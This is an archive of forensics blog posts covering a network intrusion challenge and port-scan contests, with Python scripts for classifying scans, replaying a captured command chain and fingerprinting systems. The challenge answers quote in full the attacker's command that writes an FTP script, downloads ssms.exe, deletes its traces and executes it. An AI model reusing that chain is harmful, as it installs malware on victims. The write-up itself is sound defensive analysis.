Thursday, February 4, 2010

Forensic Contest #4 released

More information at their site, but here is what they are asking you to find.

1. What was the IP address of Mr. X’s scanner?
2. What type of port scan(s) did Mr. X conduct? Check all that apply:

* TCP SYN
* TCP ACK
* UDP
* TCP Connect
* TCP XMAS
* TCP RST

3. What were the IP addresses of the targets Mr. X discovered?
4. What was the MAC address of the Apple system he found?
5. What was the IP address of the Windows system he found?
6. What TCP ports were open on the Windows system? (Please list the decimal numbers from lowest to highest.)
X-TRA CREDIT (You don’t have to answer this, but you get super bonus points if you do): What was the name of the tool Mr. X used to port scan? How can you tell? Can you reconstruct the output from the tool, roughly the way Mr. X would have seen it?

Deadline is 3/04/10 (11:59:59PM UTC-11) (In other words, if it’s still 3/04/10 anywhere in the world, you can submit your entry.)
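Question 2 turns on what each probe type looks like on the wire. The following Python script, added here as an example rather than anything from the contest or its organizers, classifies each scanner-to-target flow by the first flags the scanner sends and by how it finishes (a half-open SYN scan tears the connection down with RST right after the SYN/ACK, a connect scan ACKs first), then rolls the verdicts up into contest-style answers: scan types used, targets that answered, and open ports. The packets, addresses and ports are constructed; real work would feed it decoded packets from a pcap parser or tshark output.

```python
from collections import defaultdict

# TCP flag bits (RFC 793 order, low bit first)
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20
XMAS = FIN | PSH | URG          # "Christmas tree" probe: FIN, PSH and URG lit


def group_flows(packets, scanner):
    """Group decoded packets into flows seen from the scanner's point of view.
    Key: (proto, target ip, target port, scanner port); value: list of
    (direction, flags) in capture order, direction 'out' = sent by scanner."""
    flows = defaultdict(list)
    for p in packets:
        if p["src"] == scanner:
            key, direction = (p["proto"], p["dst"], p["dport"], p["sport"]), "out"
        elif p["dst"] == scanner:
            key, direction = (p["proto"], p["src"], p["sport"], p["dport"]), "in"
        else:
            continue                      # not scanner traffic, ignore
        flows[key].append((direction, p.get("flags", 0)))
    return flows


def classify_flow(proto, history):
    """Decide which probe type one flow is and what it says about the port."""
    if proto == "udp":
        # ICMP port-unreachable is not modelled here, so UDP is open|filtered
        return "UDP", "open|filtered"
    outs = [f for d, f in history if d == "out"]
    ins = [f for d, f in history if d == "in"]
    if not outs:
        return None, None
    first = outs[0]
    got_rst = any(f & RST for f in ins)
    got_synack = any((f & (SYN | ACK)) == (SYN | ACK) for f in ins)
    if first == XMAS:
        return "TCP XMAS", "closed" if got_rst else "open|filtered"
    if first == RST:
        return "TCP RST", "unknown"
    if first & ACK and not first & SYN:
        return "TCP ACK", "unfiltered" if got_rst else "filtered"
    if first & SYN:
        if not got_synack:
            # a bare SYN that drew RST (closed) or nothing (filtered) looks the
            # same for a SYN scan and a connect scan; leave the type ambiguous
            return "TCP SYN or Connect", "closed" if got_rst else "filtered"
        # port is open: how did the scanner finish? ACK without RST = full
        # connect(); RST straight after the SYN/ACK = half-open SYN scan
        if any(f & ACK and not f & RST for f in outs[1:]):
            return "TCP Connect", "open"
        return "TCP SYN", "open"
    return None, None


def summarize(packets, scanner):
    """Roll per-flow verdicts up into the contest-style answers."""
    scan_types, ambiguous, targets, open_ports = set(), 0, set(), defaultdict(set)
    for (proto, target, port, _sport), history in group_flows(packets, scanner).items():
        kind, state = classify_flow(proto, history)
        if kind is None:
            continue
        if any(d == "in" for d, _ in history):
            targets.add(target)           # the host answered, so it exists
        if kind == "TCP SYN or Connect":
            ambiguous += 1
        else:
            scan_types.add(kind)
        if state == "open":
            open_ports[target].add(port)
    return {"scan_types": scan_types, "ambiguous_flows": ambiguous,
            "targets": sorted(targets),
            "open_ports": {t: sorted(p) for t, p in open_ports.items()}}


# Constructed sample capture (addresses and ports are made up).
SCANNER, TARGET = "10.0.0.5", "10.0.0.9"


def tcp(src, dst, sport, dport, flags):
    return {"proto": "tcp", "src": src, "dst": dst,
            "sport": sport, "dport": dport, "flags": flags}


SAMPLE = [
    # SYN scan, port 80 open: SYN -> SYN/ACK -> RST (scanner never ACKs)
    tcp(SCANNER, TARGET, 40001, 80, SYN), tcp(TARGET, SCANNER, 80, 40001, SYN | ACK),
    tcp(SCANNER, TARGET, 40001, 80, RST),
    # port 23 closed: SYN -> RST/ACK (probe type ambiguous on its own)
    tcp(SCANNER, TARGET, 40002, 23, SYN), tcp(TARGET, SCANNER, 23, 40002, RST | ACK),
    # connect scan, port 443 open: full handshake, then teardown
    tcp(SCANNER, TARGET, 40003, 443, SYN), tcp(TARGET, SCANNER, 443, 40003, SYN | ACK),
    tcp(SCANNER, TARGET, 40003, 443, ACK), tcp(SCANNER, TARGET, 40003, 443, RST | ACK),
    # XMAS probe to 25, no reply
    tcp(SCANNER, TARGET, 40004, 25, XMAS),
    # ACK probe to 22, RST back (unfiltered)
    tcp(SCANNER, TARGET, 40005, 22, ACK), tcp(TARGET, SCANNER, 22, 40005, RST),
    # UDP probe to 53
    {"proto": "udp", "src": SCANNER, "dst": TARGET, "sport": 40006, "dport": 53},
]

if __name__ == "__main__":
    print(summarize(SAMPLE, SCANNER))
```

The ambiguous count matters in practice: a scan of a mostly-closed host produces almost nothing but SYN/RST pairs, and only the handful of open ports reveal whether the scanner completed the handshake or not.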

Tuesday, February 2, 2010

Forensics Contest #3 - Answers

Ok, not going to do a writeup on this one. NetworkMiner was able to pull all the info out without much work. Thankfully it puts TCP packets back together and reconstructs the .xml files in question. Hopefully someone out there was able to come up with a new script to pull all the info they wanted, but it wasn't me, that is for sure!

My answers were:
1. 002500FE07C4
2. AppleTV/2.4
3. h, ha, hac, hack
4. Hackers
5. http://a227.v.phobos.apple.com/us/r1000/008/Video/62/bd/1b/mzm.plqacyqb..640x278.h264lc.d2.p.m4v
6. Sneakers
7. $9.99
8. iknowyourewatchingme

Honeynet Challenge #1 - Answers

The deadline was yesterday, so I think I'm ok posting my answers. Not sure if these are correct or not, but this is what I submitted. If anyone has any questions, let me know. Again, this was a fun exercise:

Question 1. Which systems (i.e. IP addresses) are involved?

Tools Used: Satori, NetworkMiner, and Wireshark
192.150.11.111 – End system
98.114.205.102 - Attacker

-----

Question 2. What can you find out about the attacking host (e.g., where is it located)?

Tools Used: WHOIS, Wireshark

TTL 113; since it appears to be a Windows box (default initial TTL 128), that makes it 15 hops away.

According to: http://www.ipaddresslocation.org/ip-address-locator.php

They are most likely located in or around Southampton, Pennsylvania, which is at least where the local Verizon Internet Services office is located.

The attacking system appears to be a Windows 2000 box: the TTL (typically) puts it as Windows, the TCP fingerprint puts it as Windows 2000, XP or 2003, and SMB puts it as Windows 2000. SMB is normally the most reliable of those three.

-----

Question 3. How many TCP sessions are contained in the dump file?

Tools Used: NetworkMiner, verified with Wireshark

5 total:
- 4 from 98.114.205.102
- 1 from 192.150.11.111

-----

Question 4. How long did it take to perform the attack?

Tools Used: Wireshark

It depends on what part you consider the actual attack:

Max of 16.2 seconds from the first packet to the last packet in the capture. Most of the time is actually FTP’ing a file.

Within the first 2 seconds the buffer overflow has already taken place. The next 14 seconds are spent sending the command to the system and FTP’ing the file.

-----

Question 5. Which operating system was targeted by the attack? And which service? Which vulnerability?

Tools Used: Satori, wireshark

192.150.11.111

2 competing fingerprints:

* Based on TTL and TCP fingerprinting it appears to be a Linux box, most likely 2.6 kernel.
* SMB packets, on the other hand, claim it is on the VIDCAM domain and running Windows 5.1, i.e. XP (packets 16 & 19)

Based on the attack that appears to be happening against DsRoleUpgradeDownlevelServer I’d say it is an XP system; Trying to exploit MS04-011, targeting the Windows LSA Service.

-----

Question 6. Can you sketch an overview of the general actions performed by the attacker?

Tools Used: wireshark

Authenticates as a null user to IPC$, then performs a DsRoleUpgradeDownlevelServer buffer overflow. Once exploited, it forces the system to FTP a file.

First they dump these commands in the file ‘o’:

open 0.0.0.0 8884

user 1 1

get ssms.exe

Then they do:

ftp -n -s:o (suppresses auto-login and reads its commands from the ‘o’ file)

Delete the ‘o’ file to make sure nobody can see what they did, forcing quiet mode (/Q) and deletion of read-only files (/F), just in case.

Then launch ssms.exe

-----

Question 7. What specific vulnerability was attacked?

MS04-011, good writeup at:

http://research.eeye.com/html/advisories/published/AD20040413C.html

-----

Question 8. What actions does the shellcode perform? Pls list the shellcode

Tools Used: wireshark, trace tcp conversation

It targets DsRoleUpgradeDownlevelServer, does a buffer overflow with a lot of 0x31, or 1’s in ASCII. As soon as that is done it starts a new TCP conversation and does this (more info back in question #6):

echo open 0.0.0.0 8884 > o&echo user 1 1 >> o &echo get ssms.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &ssms.exe

ssms.exe

It appears to call ssms.exe twice; not sure if that is by design or due to a bug.
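To see exactly what that command string does, here is a small Python replay of it against an in-memory filesystem (an added example, not code from the post or the challenge). It splits the chain on '&' the way cmd.exe does, applies the echo redirections to build the ‘o’ script, decodes that script the way ftp -s: would read it, records the del, and ends with the launch of ssms.exe. The payload string is the one from the capture as shown above; cmd.exe's echo also writes the space before each '>', which the parser discards since ftp ignores it.

```python
import re

# The command chain from the capture, exactly as shown in the post.
PAYLOAD = ("echo open 0.0.0.0 8884 > o&echo user 1 1 >> o &echo get ssms.exe >> o "
           "&echo quit >> o &ftp -n -s:o &del /F /Q o &ssms.exe")

# echo TEXT > file  /  echo TEXT >> file
REDIRECT = re.compile(r'^echo\s+(.*?)\s*(>>|>)\s*(\S+)\s*$')


def split_commands(line):
    """cmd.exe runs '&'-joined commands left to right regardless of exit status
    ('&&' would be conditional; this payload uses only '&')."""
    return [c.strip() for c in line.split("&") if c.strip()]


def parse_ftp_script(text):
    """Turn an ftp -s: script into the network actions it implies."""
    actions = {}
    for ln in text.splitlines():
        parts = ln.split()
        if not parts:
            continue
        verb = parts[0].lower()
        if verb == "open":            # open HOST [PORT], port defaults to 21
            actions["server"] = (parts[1], int(parts[2]) if len(parts) > 2 else 21)
        elif verb == "user":          # user NAME [PASSWORD]
            actions["login"] = (parts[1], parts[2] if len(parts) > 2 else "")
        elif verb == "get":
            actions.setdefault("downloads", []).append(parts[1])
        elif verb == "quit":
            actions["quit"] = True
    return actions


def simulate(line):
    """Replay the command chain against an in-memory filesystem and log what
    each step would do. Returns (files left at the end, event log)."""
    files, events = {}, []
    for cmd in split_commands(line):
        m = REDIRECT.match(cmd)
        if m:                                   # echo ... > / >> file
            text, op, name = m.groups()
            files[name] = (files.get(name, "") if op == ">>" else "") + text + "\n"
            events.append(("write", name, text))
            continue
        argv = cmd.split()
        verb = argv[0].lower()
        if verb == "ftp":                       # resolve -s:FILE against our files
            script = next((a[3:] for a in argv[1:] if a.lower().startswith("-s:")), None)
            events.append(("ftp", script, parse_ftp_script(files.get(script, ""))))
        elif verb == "del":                     # skip /F /Q style switches
            for name in [a for a in argv[1:] if not a.startswith("/")]:
                files.pop(name, None)
                events.append(("delete", name, None))
        else:                                   # anything else is just executed
            events.append(("exec", argv[0], argv[1:]))
    return files, events


if __name__ == "__main__":
    remaining, log = simulate(PAYLOAD)
    for ev in log:
        print(ev)
    print("files left behind:", remaining)
```

The replay makes the forensic point explicit: by the time the chain finishes, ‘o’ no longer exists on disk, so the capture (where the echo commands travel in the clear) is the only place the FTP script survives.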

-----

Question 9. Do you think a Honeypot was used to pose as a vulnerable victim? Why?

Tools Used: Satori (http://myweb.cableone.net/xnih)

Yes. Go back to #5. The TCP fingerprint shows the box as Linux 2.6; SMB shows the box as Windows XP. The TTL can be tweaked on Windows, but the rest of the TCP fingerprint is hard to modify, though there are some tweaks that may allow this.
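Questions 2, 5 and 9 all rest on the same reasoning: derive the initial TTL and hop count from the observed TTL, match the SYN's window and option layout against a signature table, then compare that kernel-level guess with what the host claims about itself in SMB. The Python below is an added illustration, not Satori's or p0f's code. Its signature table is a constructed toy with only a Linux 2.6 and a Windows 2000/XP/2003 entry built from widely published defaults, and both sample hosts are constructed except for the attacker's TTL of 113 taken from the post. Real tools keep separate SYN and SYN/ACK tables, and an administrator can change any of these defaults, so a match is evidence rather than proof.

```python
# Common initial TTL values (assumption: typical stack defaults).
INITIAL_TTLS = (32, 64, 128, 255)


def ttl_to_initial(observed):
    """Map an observed TTL to the smallest common initial TTL at or above it
    and the implied hop count. Observed 113 -> (128, 15)."""
    for initial in INITIAL_TTLS:
        if observed <= initial:
            return initial, initial - observed
    raise ValueError("TTL out of range: %d" % observed)


# Toy SYN signatures: (label, initial TTL, window rule, TCP option layout).
# Constructed from widely published defaults, not a real fingerprint database.
SYN_SIGNATURES = (
    ("Linux 2.6", 64, lambda win, mss: win == 4 * mss,
     ("MSS", "SACK", "TS", "NOP", "WS")),
    ("Windows 2000/XP/2003", 128, lambda win, mss: win in (16384, 64240, 65535),
     ("MSS", "NOP", "NOP", "SACK")),
)


def tcp_fingerprint(ttl, window, mss, options):
    """Return every signature label consistent with the packet's shape."""
    initial, _ = ttl_to_initial(ttl)
    return [label for label, sig_ttl, win_ok, layout in SYN_SIGNATURES
            if sig_ttl == initial and win_ok(window, mss) and tuple(options) == layout]


def assess(host):
    """Combine the network-layer guess with what the host says about itself in
    SMB. A disagreement is the honeypot tell from question 9: the SMB banner is
    application data a honeypot can fake, the SYN shape comes from the kernel."""
    initial, hops = ttl_to_initial(host["ttl"])
    stack = tcp_fingerprint(host["ttl"], host["window"], host["mss"], host["options"])
    claimed = host.get("smb_family")          # e.g. "Windows" from "Windows 5.1"
    conflict = bool(stack) and claimed is not None and not any(claimed in s for s in stack)
    return {"initial_ttl": initial, "hops": hops, "tcp_stack": stack,
            "smb_family": claimed, "conflict": conflict}


# Constructed sample hosts. The attacker's TTL of 113 is the value from the
# post; every other field is made up to exercise the check.
ATTACKER = {"ttl": 113, "window": 65535, "mss": 1460,
            "options": ("MSS", "NOP", "NOP", "SACK"), "smb_family": "Windows"}
VICTIM = {"ttl": 64, "window": 5840, "mss": 1460,
          "options": ("MSS", "SACK", "TS", "NOP", "WS"), "smb_family": "Windows"}

if __name__ == "__main__":
    for name, host in (("attacker", ATTACKER), ("victim", VICTIM)):
        print(name, assess(host))
```

For the constructed victim the kernel says Linux 2.6 while SMB says Windows, which is the same contradiction the post found with Satori; for the attacker both layers agree on Windows at 15 hops.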

-----

Question 10. Was there malware involved? Whats the name of the malware? (We are not looking for a detailed malware analysis for this challenge)

ssms.exe may be the W32/Spybot-MP worm and IRC backdoor, but without analysis it is hard to say. That is just a guess based on the name and the name alone.

-----

Question 11. Do you think this is a manual or an automated attack? Why?

Automated; it only took 16 seconds from start to finish. Typing this sentence up took that long, with a few typos! Not to mention, most of that 16.2 seconds was downloading the ssms.exe file. So while it is possible someone sat there and did it, given how quickly it took place it seems unlikely.

Monday, January 25, 2010

Honeynet - Challenge 1 of the Forensic Challenge 2010

Ok, I posted this a week or so ago to the NetworkMiner beta list, but forgot to put anything up on here about it. This was a fun exercise, different from the other ones I've done and posted about recently.

It was short notice when I put it on that list, even shorter here, but...

In this case, no need to write code, just find the answers and tell them what program(s) you used.

----

The Challenge:
A network trace with attack data is provided. (Note that the IP address of the victim has been changed to hide the true location.) Analyze and answer the following questions:

1. Which systems (i.e. IP addresses) are involved? (2pts)
2. What can you find out about the attacking host (e.g., where is it located)? (2pts)
3. How many TCP sessions are contained in the dump file? (2pts)
4. How long did it take to perform the attack? (2pts)
5. Which operating system was targeted by the attack? And which service? Which vulnerability? (6pts)
6. Can you sketch an overview of the general actions performed by the attacker? (6pts)
7. What specific vulnerability was attacked? (2pts)
8. What actions does the shellcode perform? Pls list the shellcode. (8pts)
9. Do you think a Honeypot was used to pose as a vulnerable victim? Why? (6pts)
10. Was there malware involved? Whats the name of the malware? (We are not looking for a detailed malware analysis for this challenge) (2pts)
11. Do you think this is a manual or an automated attack? Why? (2pts)

Sunday, January 24, 2010

Infected sites and Google Alerts

Not so much on OS fingerprinting, but thanks to the Google Alerts I have set up on fingerprinting I've been getting a look at a couple hundred sites that have been taken over in some form or another since just before Christmas. Google is notifying me of compromised sites and I don't want it anymore; I want to go back to useful alerts about new fingerprinting info out there!

Sites end up being:
http://somewhere.wherever/5-6 character junk/

For the first 2 I saw I actually dropped notes to those compromised and was happy to see them clean them up; whether they patched, I have no idea, but they cleaned up.

Everything was Apache from what I could tell doing banner grabbing with Satori. It wasn't something I was too worried about, but .....

Could be an apache hole, openssl, php, etc. Hard to say.

Looking at one that has been compromised since Christmas the following layout is there:
1g
1r.txt
1t
2.js
2r.txt
academia.php
accenture.php
....
fingerprinting.php
...
passive.php


1g -
file seems to list a ton of other sites, possibly ones compromised or possibly ones to dump you off to. I played around a bit with it back at Christmas, assumed the problem would go away and forgot about it for the most part. But since it is a month later and I'm still getting new ones each day I figured I'd at least post something on it.

1t -
possibly usernames it is trying

2r -
php files it is going to create

Simple search to find pages with google to get an idea:
"fingerprinting the dead with rigor morits"

Based on file times I assume there is some type of automated scan they are doing, dumping their first .php file on it. Then someone goes through those lists 12-24 hours later and uploads the rest. Just looking at timestamps on the files, there is typically one file created on day 0, then all the others get created the next day, but not all at the same time: one here, one there.

Anyway, if anyone is going to go poking around, make sure you only request the subdir (directory listing is turned on in all the ones I looked at). That is, rather than:
http://xxxxxxxx.com/z1jyed/fingerprinting.php
only go to:
http://xxxxxxxx.com/z1jyed/

Oh yeah, I was going to go poke around on some of my Apache boxes and make sure they weren't compromised. Maybe tomorrow.

Monday, January 4, 2010

Passive Fingerprinting of Network Reconnaissance Tools

Last month I ran across the initial 3-page IEEE summary of this thesis. At the time I wasn't able to find a full copy of it, though now it looks like there is a copy out there on dtic.mil.

In a nutshell, they look at the visual fingerprint a scanner such as Nmap, UnicornScan, etc. makes as it scans a system. By utilizing the information they obtain, they can tell what program is scanning your system.

Anyway, an interesting twist: fingerprinting the application that is scanning you. I had looked at doing this with some products, but never to this extent. Very nicely done!

Monday, December 28, 2009

Forensics Contest #3 released

For the holidays they released challenge #3. This time you'll need to reassemble packets to get the whole picture! It may be beyond what I can throw together in Perl; actually, I'm 99% sure it is, since I tried to do this a little last time. I'll probably write something in C or Pascal for it. The problem with doing it in Pascal is they are going to want the source and I'm not sure I'm willing to give up my source on WinPcap stuff. We'll see; maybe use something else to rip the traffic out and then just put a nice GUI front end on it with Pascal. Who knows.

Anyway, check it out.